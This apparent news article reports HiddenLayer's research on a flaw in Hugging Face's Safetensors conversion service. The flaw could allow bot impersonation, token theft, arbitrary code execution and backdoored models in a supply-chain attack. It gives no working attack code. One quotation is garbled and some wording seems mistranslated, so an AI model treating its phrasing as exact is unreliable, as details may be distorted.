AI Models Could Be Attacked Due to This Hugging Face Vulnerability – Security Concerns Add to AI Concerns
There is a way to abuse the Hugging Face Safetensors conversion tool to hijack AI models and conduct supply chain attacks.
This is what security researchers at HiddenLayer, who discovered the flaw and published their findings last week, say: The hacker news reports.
For the uninitiated, Hugging Face is a collaboration platform where software developers can host and collaborate on any number of pre-trained machine learning models, datasets, and applications.
Changing a commonly used model
Safetensors is Hugging Face’s format for securely storing tensors, which also allows users to convert PyTorch models to Safetensor via a pull request.
And that’s where the problem lies, as HiddenLayer says the conversion service could be compromised: “It is possible to send malicious pull requests containing attacker-controlled data from the Hugging Face service to any repository on the platform, and to hijack models that are.” submitted through the conversion service.”
Thus, the hijacked model that is supposed to be converted allows threat actors to make changes to any Hugging Face repository, claiming to be the conversion bot.
Furthermore, hackers can also exfiltrate SFConversionbot tokens – which belong to the bot making the pull requests – and sell malicious pull requests themselves.
Consequently, they could tweak the model and set up neural backdoors, which is essentially a sophisticated supply chain attack.
“An attacker can execute any arbitrary code when someone tries to convert their model,” the study said. “Without any indication to the user themselves, their models could be hijacked upon conversion.”
Finally, when a user tries to convert a repository, the attack can result in their Hugging Face token being stolen, giving the attackers access to limited internal models and datasets. From then on, they could compromise it in a variety of ways, including dataset poisoning.
In one hypothetical scenario, a user submits a conversion request to a public repository, unknowingly changing a commonly used model, resulting in a dangerous attack on the supply chain.
“Despite the best intentions to secure machine learning models in the Hugging Face ecosystem, the conversion service has proven to be vulnerable and has the potential to cause a widespread supply chain attack through the Hugging Face official service,” concluded the researchers.
“An attacker could gain a foothold in the container the service is running on and compromise any model converted by the service.”